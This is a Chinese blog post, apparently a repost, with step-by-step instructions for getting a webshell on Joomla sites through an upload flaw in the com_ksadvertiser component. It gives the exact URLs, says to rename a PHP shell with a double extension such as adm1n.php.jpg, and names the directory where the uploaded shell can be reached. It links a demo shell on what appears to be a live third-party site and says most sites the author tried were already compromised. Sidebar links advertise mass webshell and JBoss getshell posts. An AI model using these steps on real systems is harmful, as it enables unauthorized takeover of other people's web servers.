Joomla 远程上传漏洞.直接getshell

最新推荐文章于 2024-06-27 08:00:00 发布
最新推荐文章于 2024-06-27 08:00:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: shell upload login image 测试

作者:1337

1.  有些joomal需要先注册.

http://site/index.php?option=com_user&view=login

2.  到上传地址

http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

3.  点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.

4.  上传后的文件在 / images/ksadvertiser/U0 这个目录下.

http://site/images/ksadvertiser/U0/adm1n.php.gif

Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

我随便测试了一下, 基本都被搞了. 疯狂的人们啊, 这今天刚出的漏洞就成这样了… 1337V5啊.

7禧
关注
专栏目录
Joomla反序列化通杀漏洞(版本低于3.4.5)复现的那些坑
Just Do It
12-18 9351
这是最近流出来的一个漏洞,利用Joomla反序列化可以造成远程代码执行。关于该漏洞的分析可以参考一下链接:       wooyun drops上的:http://drops.wooyun.org/papers/11330       Freebuf上的:http://www.freebuf.com/vuls/89754.html       360播报上的:http://bobao.360
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1831
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
教你批量拿joomla的webshell(图)
05-01
教你批量拿joomla的webshell(图) 教你批量拿joomla的webshell(图)
joomla后台拿shell
风雨来花满楼的博客
07-21 2948
整理了joomla后台拿shell的几种方法,不解释,至于怎么进后台晓得也不晓得… 第一种 官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加<filename>>test.php</filename> 将test.php放到admin文件夹内,重新打包zip,后台操作Extensions–> install–>upload package file shell_url:/administrator/compon
Jboss通过未授权/弱口令进入后台上传webshell
最新发布
qq_68163788的博客
06-27 802
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Joomla更新语言包后台直接shell
kikaylee的专栏
10-23 3796
后台有个专门更新插件的接口,只支持上传ZIP文件。 下载了一个中文语言包ZIP格式的,解压出来如下: pkg_zh_CN.xml 代码如下:   升级或者更新插件读取XML里面的 site_zh-CN.zip 和 admin_zh-CN.zip 解压 admin_zh-CN.zip install.xml 里面的代码: install.xml:
利用joomla 3.2.0 – 3.4.4 注入漏洞到getshell
收集盒 Book box
12-17 6716
这本来是一个APT项目,所以详细内容不方便具体透露,涉及到敏感的东西,我用本地测试环境代替。 之前渗透的时候,目标站大部分都是joomla的cms,当时就放弃了,最近joomla的sql注入漏洞让我重新燃起了希望,然后找到所有的joomla,根据后台的样子,大概判断版本,然后找到了两个子站存在问题。 测试爆出管理员密码。语句如下: http://10.211.55.3/joomla/
Joomla远程上传漏洞直接getshell
fengling132的专栏
08-15 2692
作者:1337   1.  有些joomal需要先注册.   http://site/index.php?option=com_user&view=login   2.  到上传地址   http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en   3.
Java反序列化漏洞利用工具(joomla
01-01
该工具"joomla-getshell-EXP-master"显然是为了利用这种漏洞而设计的。"GETSHELL"通常指的是攻击者获取服务器的shell访问权限,这通常是通过执行命令或者部署后门实现的。这意味着该工具可以用来测试目标Joomla系统...
JoomlaRCE远程代码执行(CVE-2020-11890)复现
玄道的网安博客
08-17 2403
简介 Joomla! CMS versions 2.5.0 – 3.9.16版本在处理用户组时缺少对根用户组的检查,从而导致了一个提权漏洞的产生(CVE-2020-11890)。 影响版本 CMS versions 2.5.0 - 3.9.16 环境搭建 Joomla下载地址https://downloads.joomla.org/cms/joomla3/3-8-2 我这里下载的是Joomla! 3.8.2 Full Package (.zip) 版本 按照顺序安装即可 ..
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857 Joomla注入漏洞利用工具,有需要自行下载
Java反序列化漏洞利用工具(WebLogic&Jboss)
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
joomla CMS后台另类拿WebShell方法
fengling132的专栏
08-15 2786
漏洞概要关注数(0) 关注此漏洞 缺陷编号: WooYun-2011-02640 漏洞标题: joomla CMS后台另类拿WebShell方法 相关厂商: joomla CMS 漏洞作者: akacd 提交时间: 2011-08-07 公开时间: 2011-08-07 漏洞类型: 命令执行 危害等级: 中 自评Rank: 7
批量拿joomla的webshell
fengling132的专栏
08-15 3419
本次批量拿的webshell都是php的,而且大都是linux服务器搭建的,大家不要去搞破坏! 首先,Google:核心是 Joomla!. 有效 XHTML 和 CSS.   打开网址,加上后缀:index.php?option=com_user&view=reset&layout=confirm来到确认用户页面,提示你要输入暗号,我们输入单引号 ' ,点击发送,
Jboss getshell
aiguang4476的博客
05-08 5698
Jboss 的安装需要 JDK 环境 JDK+JBOSS 包 初始环境配置 系统变量名 变量值 PATH %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin JAVA_HOME C:\Program Files (x86)\Java\jdk1.6.0_43 CLASSPATH .;%...
[原创]K8 Jboss jmx-console getshell exploit
weixin_30496431的博客
04-02 416
[原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内网遇到几台Jboss,使用MSF确实是有点烦,要打几条命令设置一堆参数,我一个粘贴搞定的 为什么非要使用手动打好几条命令,让外行人看起来牛逼吗?大家都知道黑客电影打字快并不是高手 那些...
Jboss弱口令Getshell
HAKUNAMATATATTA的博客
12-09 1416
JBoss Administration Console存在默认账号密码admin/vulhub,如果Administration Console可以登录,就可以在后台部署war包getshell
Jboss 未授权访问漏洞getshell漏洞复现
W小哥
11-24 1865
一、漏洞描述 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 二、环境搭建 利用vulhub的CVE-2017-7504环境 三、漏洞复现
使用Joomla!3.x轻松构建网站指南
"Joomla3.x Made Easy" 本书"Joomla3.x Made Easy"是一本专为初学者设计的指南,旨在帮助读者了解并轻松掌握使用Joomla!内容管理系统(CMS)来创建和管理网站的方法。Joomla!是一种免费开源的软件,特别适合构建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值